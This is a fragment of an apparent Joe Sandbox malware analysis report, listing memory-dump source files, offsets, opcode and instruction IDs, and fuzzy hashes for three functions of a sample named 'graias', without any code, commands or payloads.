                                                                                                                                                                                              • Source File: 00000008.00000002.1848925547.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_135d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction ID: 1dcfb9f5729b20969fb1ea3f1911263b4be37f0c1e20086751f3fa9d6f8b5a18
                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11DFB2404240CFDB06CF44D5C4B56BF72FB94328F24C2A9DD090B256C33AE45ACBA1
                                                                                                                                                                                              Function 0136D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction ID: 22fdd415041c999ff4073b269bc957c6c2b1eba0636b8b5d13b1634b6085226f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D118E75604280DFDB16CF54D5C4B15BF71FB84318F24C6AAD8494B65AC33AD44ACB61
                                                                                                                                                                                              Function 0136D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000008.00000002.1849343648.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_136d000_graias.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction ID: 9c0f1c3b6504844234759444ca9969704fd856f00bfd715c5c213d26a92da93b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32118B75604280DFDB16CF54D5C4B15BFB1FB84228F28C6AAD8894B69AC33AD44ACB61